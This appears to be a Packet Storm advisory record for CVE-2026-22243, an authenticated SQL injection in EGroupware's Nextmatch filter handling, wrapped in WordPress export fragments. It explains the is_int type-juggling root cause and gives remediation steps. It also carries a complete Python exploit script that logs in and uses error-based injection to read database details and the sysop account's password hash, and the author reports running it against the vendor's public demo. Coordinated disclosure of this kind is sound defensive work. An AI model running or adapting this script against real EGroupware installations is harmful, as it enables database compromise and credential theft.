{“lastseen”:”2026-04-13T15:48:46″,”description”:”EGroupware versions prior to 23.1.20260113 and greater than or equal to 26.0.20251208 but less than 26.0.20260113 are affected by a remote SQL injection vulnerability in the Nextmatch filter processing…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 EGroupware SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218757″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-22243″],”sourceData”:”# CVE-2026-22243: EGroupware has SQL Injection in Nextmatch Filter Processing\\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2026-22243](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-22243) |\\n | **Severity** | HIGH |\\n | **Advisory** | [View Advisory](https:\/\/github.com\/EGroupware\/egroupware\/security\/advisories\/GHSA-rvxj-7f72-mhrx) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **egroupware\/egroupware** (versions: \\u003c 23.1.20260113)\\n – **egroupware\/egroupware** (versions: \\u003e= 26.0.20251208, \\u003c 26.0.20260113)\\n \\n \\n ## CWE Classification\\n \\n – CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)\\n \\n ## Details\\n \\n ### Summary\\n **Critical Authenticated SQL Injection in Nextmatch Widget Filter Processing**\\n \\n A critical SQL Injection vulnerability exists in the core components of EGroupware, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application.\\n \\n ### Details\\n **Root Cause Analysis**\\n The vulnerability exists in how the database abstraction layer (`Api\\\\Db`) and high-level storage classes (`Api\\\\Storage\\\\Base`, `infolog_so`) process the `col_filter` array used in \\”Nextmatch\\” widgets.\\n \\n The application attempts to validate input using `is_int($key)` to determine if an array key represents a raw SQL fragment that should be trusted. However, when processing JSON-based POST requests, PHP’s `json_decode` automatically converts numeric string keys (e.g., `\\”0\\”`) into native integers.\\n \\n Consequently, an attacker can send a JSON payload with an associative array containing numeric keys. The application interprets these keys as integers (`is_int` returns true) and blindly appends the associated values – containing malicious SQL – directly to the query.\\n \\n **Vulnerable Code Locations**\\n \\n 1. **File:** `sources\/egroupware\/api\/src\/Db.php` (Approx. Line 1776)\\n Method: `column_data_implode`\\n \\n “`php\\n \/\/ In function column_data_implode\\n elseif (is_int($key) \\u0026\\u0026 $use_key===True) {\\n if (empty($data)) continue;\\n \/\/ VULNERABLE: $data is appended directly to SQL without sanitization\\n $values[] = $data; \\n }\\n “`\\n \\n 2. **File:** `sources\/egroupware\/api\/src\/Storage\/Base.php` (Approx. Line 1134)\\n Method: `parse_search`\\n \\n “`php\\n \/\/ In function parse_search\\n foreach($criteria as $col =\\u003e $val) {\\n \/\/ VULNERABLE: is_int() returns true for JSON keys like \\”0\\”\\n if (is_int($col)) {\\n $query[] = $val; \\n }\\n \/\/ …\\n }\\n “`\\n \\n ### PoC\\n I have verified this vulnerability on a local Docker instance and confirmed it (read-only) on your public demo instance ([demo.egroupware.net](http:\/\/demo.egroupware.net\/)).\\n \\n \\n **Automated Exploit Script:**\\n The following script automates the login, exec_id extraction, and data exfiltration via Error-Based SQL Injection.\\n \\n “`python\\n import requests\\n import re\\n import sys\\n import urllib3\\n \\n # Suppress SSL warnings\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n # CLI Configuration\\n BASE_URL = sys.argv[1].rstrip(‘\/’) if len(sys.argv) \\u003e 1 else \\”http:\/\/localhost:8088\/egroupware\\”\\n LOGIN_USER = sys.argv[2] if len(sys.argv) \\u003e 2 else \\”sysop\\”\\n LOGIN_PASS = sys.argv[3] if len(sys.argv) \\u003e 3 else \\”password123\\”\\n \\n session = requests.Session()\\n session.verify = False\\n session.headers.update({\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/115.0.0.0 Safari\/537.36\\”\\n })\\n \\n def extract_form_inputs(html):\\n inputs = {}\\n matches = re.findall(r’\\u003cinput[^\\u003e]+\\u003e’, html)\\n for match in matches:\\n name_m = re.search(r’name=[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]’, match)\\n value_m = re.search(r’value=[\\”\\\\’]([^\\”\\\\’]*)[\\”\\\\’]’, match)\\n if name_m:\\n name = name_m.group(1)\\n value = value_m.group(1) if value_m else \\”\\”\\n inputs[name] = value\\n return inputs\\n \\n def login():\\n print(f\\”[*] Target: {BASE_URL}\\”)\\n login_url = f\\”{BASE_URL}\/login.php\\”\\n \\n try:\\n print(\\”[*] Retrieving login form…\\”)\\n r_get = session.get(login_url, timeout=10)\\n \\n data = extract_form_inputs(r_get.text)\\n \\n data.update({\\n \\”login\\”: LOGIN_USER,\\n \\”passwd\\”: LOGIN_PASS,\\n \\”submitit\\”: \\”Login\\”,\\n \\”passwd_type\\”: \\”text\\”\\n })\\n \\n if ‘cancel’ in data: del data[‘cancel’]\\n \\n print(f\\”[*] Attempting login as: {LOGIN_USER}…\\”)\\n r_post = session.post(login_url, data=data, allow_redirects=True, timeout=15)\\n \\n if ‘name=\\”passwd\\”‘ in r_post.text and ‘logout.php’ not in r_post.text:\\n print(\\”[-] Login failed. Server returned login form.\\”)\\n return False\\n \\n print(\\”[+] Login successful.\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Critical error during login: {e}\\”)\\n return False\\n \\n def get_exec_id():\\n print(\\”[*] Retrieving exec_id…\\”)\\n url = f\\”{BASE_URL}\/index.php?menuaction=addressbook.addressbook_ui.index\\”\\n try:\\n r = session.get(url, timeout=10)\\n \\n match = re.search(r’etemplate_exec_id(?:\\”|\\”|\\\\\\\\\\”)\\\\s*:\\\\s*(?:\\”|\\”|\\\\\\\\\\”)([^\\u0026\\”\\\\\\\\]+)’, r.text)\\n \\n if match:\\n eid = match.group(1)\\n print(f\\”[+] ID found: {eid}\\”)\\n return eid\\n else:\\n if ‘name=\\”passwd\\”‘ in r.text:\\n print(\\”[-] Session expired or login failed.\\”)\\n else:\\n print(\\”[-] exec_id pattern not found in source code.\\”)\\n except Exception as e:\\n print(f\\”[-] Error retrieving ID: {e}\\”)\\n return None\\n \\n def run_query(eid, sql):\\n full = \\”\\”\\n url = f\\”{BASE_URL}\/json.php?menuaction=EGroupware\\\\\\\\Api\\\\\\\\Etemplate\\\\\\\\Widget\\\\\\\\Nextmatch::ajax_get_rows\\”\\n \\n print(f\\”[*] Executing SQLi: {sql}\\”)\\n \\n for offset in range(1, 201, 30):\\n chunk_sql = f\\”SUBSTRING(({sql}), {offset}, 30)\\”\\n payload = f\\”1=1 AND EXTRACTVALUE(1, CONCAT(0x7e, ({chunk_sql}), 0x7e))\\”\\n \\n post_data = {\\n \\”request\\”: {\\n \\”parameters\\”: [eid, {\\”start\\”: 0, \\”num_rows\\”: 1}, {\\”col_filter\\”: {\\”0\\”: payload}}]\\n }\\n }\\n \\n try:\\n r = session.post(url, json=post_data, timeout=10)\\n \\n match = re.search(r\\”XPATH syntax error: ‘~(.*)~’\\”, r.text)\\n if not match:\\n match = re.search(r\\”~([^~]+)~\\”, r.text)\\n \\n if match:\\n chunk = match.group(1)\\n if \\”…\\” in chunk: chunk = chunk.replace(\\”…\\”, \\”\\”)\\n \\n full += chunk\\n if len(chunk) \\u003c 1: break\\n else:\\n break\\n \\n except Exception as e:\\n print(f\\”[-] Query error: {e}\\”)\\n break\\n \\n return full if full else \\”NO DATA \/ ERROR\\”\\n \\n if __name__ == \\”__main__\\”:\\n if login():\\n eid = get_exec_id()\\n if eid:\\n print(\\”\\\\n\\” + \\”=\\”*40)\\n print(\\” SQL INJECTION RESULTS \\”)\\n print(\\”=\\”*40)\\n print(f\\”[+] DB Version: {run_query(eid, ‘SELECT @@version’)}\\”)\\n print(f\\”[+] DB Name: {run_query(eid, ‘SELECT database()’)}\\”)\\n print(f\\”[+] DB User: {run_query(eid, ‘SELECT user()’)}\\”)\\n \\n print(\\”\\\\n[*] Retrieving hash for ‘sysop’ user (if exists):\\”)\\n res = run_query(eid, \\”SELECT CONCAT(account_lid,’:’,account_pwd) FROM egw_accounts WHERE account_lid=’sysop’\\”)\\n print(f\\” \\u003e {res}\\”)\\n print(\\”=\\”*40 + \\”\\\\n\\”)\\n “`\\n \\n **Proof of Verification** on [demo.egroupware.net](http:\/\/demo.egroupware.net\/): \\n \\n I executed the script against your public demo to confirm exploitability in a production-like environment (read-only).\\n \\u003cimg width=\\”773\\” height=\\”393\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/ae97ea37-21fa-4718-98f5-f7f9696f3c2e\\” \/\\u003e\\n \\n **Impact:**\\n Attackers with low-privileged access can fully compromise the database. This allows for:\\n * **Confidentiality Loss:** Reading sensitive data (e.g., password hashes, session tokens, personal contact details, configuration secrets).\\n * **Integrity Loss:** Modifying or deleting arbitrary data within the application.\\n * **Availability Loss:** Potential to drop tables or corrupt data.\\n \\n ### Remediation\\n **1. Input Validation (Whitelisting)**\\n Do not rely solely on `is_int()` for security decisions when handling external input, especially JSON data where keys can be numeric strings. Implement a strict **whitelist (allowlist)** of allowed column names for filtering in `Nextmatch` widgets. If the key\/column is not in the whitelist, reject the request.\\n \\n **2. Parameter Binding**\\n Ensure all filter values are bound as parameters (prepared statements) rather than being concatenated directly into the SQL string.\\n \\n **3. Strict Type Checking**\\n When processing JSON input, ensure that keys are strictly checked against expected types (e.g., using `===` for strict comparison or `filter_var`) before being used in SQL generation logic.\\n \\n \\n ### Credits\\n \\n Reported by \u0141ukasz Rybak\\n \\n ## References\\n \\n – https:\/\/github.com\/EGroupware\/egroupware\/security\/advisories\/GHSA-rvxj-7f72-mhrx\\n – https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-22243\\n – https:\/\/github.com\/EGroupware\/egroupware\/releases\/tag\/23.1.20260113\\n – https:\/\/github.com\/EGroupware\/egroupware\/releases\/tag\/26.0.20260113\\n – https:\/\/github.com\/advisories\/GHSA-rvxj-7f72-mhrx\\n \\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218757″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218757\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-13T15:48:46″,”description”:”EGroupware versions prior to 23.1.20260113 and greater than or equal to 26.0.20251208 but less than 26.0.20260113 are affected by a remote SQL injection vulnerability in…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-46309","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n